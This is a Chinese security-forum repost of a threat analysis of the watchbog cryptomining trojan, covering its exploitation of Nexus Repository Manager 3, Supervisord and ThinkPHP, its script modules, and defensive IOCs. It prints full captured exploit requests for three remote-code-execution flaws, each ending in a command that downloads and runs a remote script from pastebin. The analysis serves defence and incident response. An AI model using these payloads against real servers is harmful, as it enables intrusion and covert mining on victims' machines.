吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 13520|回复: 20
收起左侧

[转载] 【转帖】Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复

  [复制链接]
默小白 发表于 2019-3-19 08:59
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

转自:https://xz.aliyun.com/t/4465

背景

近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件。

值得注意的是,这一攻击开始的时间(2月24日)与2月5日上述产品的母公司发布漏洞公告相隔仅仅半个多月,再次印证了“漏洞从曝光到被黑产用于挖矿的时间越来越短”。此外,攻击者还利用了Supervisord、ThinkPHP等产品的漏洞进行攻击。

本文分析了该木马的内部结构和传播方式,并就如何清理、预防类似挖矿木马给出了安全建议。

挖矿木马传播分析

攻击者主要通过直接攻击主机服务的漏洞来进行木马的传播,也就是说它目前不具备蠕虫的传染性,这一点上类似8220团伙。即便如此,攻击者仍然获取了大量的肉鸡。

尤其2月24日,攻击者从原本只攻击ThinkPHP和Supervisord,到加入了Nexus Repository Manager 3的攻击代码,可以看到其矿池算力当天即飙升约3倍,达到了210KH/s左右(盈利约25美元/天),意味着最高时可能有1~2万台主机受控进行挖矿。

img

以下为阿里云安全采集到的3种攻击payload

(1)针对Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)的利用

POST /service/extdirect HTTP/1.1

Host: 【victim_ip】:8081

X-Requested-With: XMLHttpRequest

Content-Type: application/json

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

(2)针对Supervisord远程命令执行漏洞(CVE-2017-11610)的利用

POST /RPC2 HTTP/1.1

Host: 【victim_ip】:9001

Content-Type: application/x-www-form-urlencoded

<?xml version=\"1.0\"?>\u0002<methodCall>\u0002<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\u0002<params>\u0002<param>\u0002<string>curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby</string>\u0002</param>\u0002</params>\u0002</methodCall>

(3)针对ThinkPHP远程命令执行漏洞的利用

POST /index.php?s=captcha HTTP/1.1

Host: 【victim_host】

Content-Type: application/x-www-form-urlencoded

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby

以上三种payload的目的都是相同的,那就是控制主机执行以下命令

curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby

木马功能结构分析

img

被攻击的主机受控访问https://pastebin.com/raw/zXcDajSs,经多次跳转后,会得到如下图所示的shell脚本,其包含cronlow(), cronhigh(), flyaway()等多个函数。

img

分析后得出,该脚本主要包含以下几个模块:

1.挖矿模块

img

挖矿模块的download()函数,会从https://ptpb.pw/D8r9(即$mi_64解码后的内容)下载由xmrig改写的挖矿程序,保存为/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog,并从https://ptpb.pw/hgZI下载配置文件,之后启动挖矿。

另一个函数testa()也是类似,只不过它下载的是xmr-stak挖矿程序。

2.持久化模块

将要执行的恶意命令写入/etc/cron.d/root等多个文件

img

3.c&c模块

c&c模块主要在dragon()和flyaway()函数中实现。

img

如下图所示为解码后的dragon函数

img

它会依次请求https://pastebin.com/raw/05p0fTYd 等多个地址,并执行收到的命令。有趣的是,这些地址目前存放的都是一些普通单词,可能是木马作者留待将来使用。

flyaway()函数则与dragon()稍有不同,它会先从https://pixeldra.in/api/download/8iFEEg下载/tmp/elavate。

img

逆向可知,/tmp/elavate是使用Ubuntu本地权限提升漏洞(CVE-2017-16995)进行提权的二进制程序。提权后,尝试以root权限执行从https://pastebin.com/raw/aGTSGJJp获取的命令。

img

img

安全建议

阿里云安全已和pastebin.com进行联系,要求禁止对上述恶意下载链接的访问,对方暂未回应。此外,云安全为用户提供如下安全建议:

  1. 互联网上攻击无处不在,用户平时应及时更新服务,或修补服务漏洞,避免成为入侵的受害者。
  2. 建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽pastebin.com、thrysi.com等广泛被挖矿木马利用的网站,达到阻断入侵的目的。
  3. 对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但希望保障系统安全的企业。

IOC

矿池地址:

pool.minexmr.com:443

钱包地址:

44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B

相关文件:

img

其他恶意url:

https://pastebin.com/raw/AgdgACUD

https://pastebin.com/raw/vvuYb1GC

https://pixeldra.in/api/download/nZ2s4L (用来下载32位XMR挖矿程序,链接已失效)

https://pastebin.com/raw/aGTSGJJp(目前不存在

https://pastebin.com/raw/05p0fTYd

https://pastebin.com/raw/KxWPFeEn

https://pastebin.com/raw/X6wvuv98

Reference

https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019

https://cloud.tencent.com/developer/article/1390628

https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

免费评分

参与人数 3吾爱币 +5 热心值 +2 收起 理由
张老弟 + 1 谢谢@Thanks!
willJ + 3 + 1 鼓励转贴优秀软件安全工具和文档!
萧菜鸟 + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

xyq038558 发表于 2019-4-13 16:57
前段时间公司服务器刚好中了这挖矿木马,服务器上跑着Nexus Repository Manager,幸好当时使用非root用户,否则横向感染后果不堪设想。
~零度 发表于 2019-3-20 09:41
god147 发表于 2019-3-19 09:58
于洪生 发表于 2019-3-19 10:23
厉害 了啊
w3528810 发表于 2019-3-19 10:46
谢谢大佬的IOC威胁情报
WJJIahUa 发表于 2019-3-19 10:53
360可以查杀吗
麦肯锡 发表于 2019-3-19 11:53
挖矿简直了,我电脑貌似也中过
树泽 发表于 2019-3-19 12:11
阿里云还不错啊啊
BlackCicada 发表于 2019-3-19 12:23
学到了,谢谢分享
狮王 发表于 2019-3-19 12:57
谢谢大佬的IOC情报哈~
无尾熊0129 发表于 2019-3-19 15:25
多谢分享,不知道火绒可以拦截不
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 11:06

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表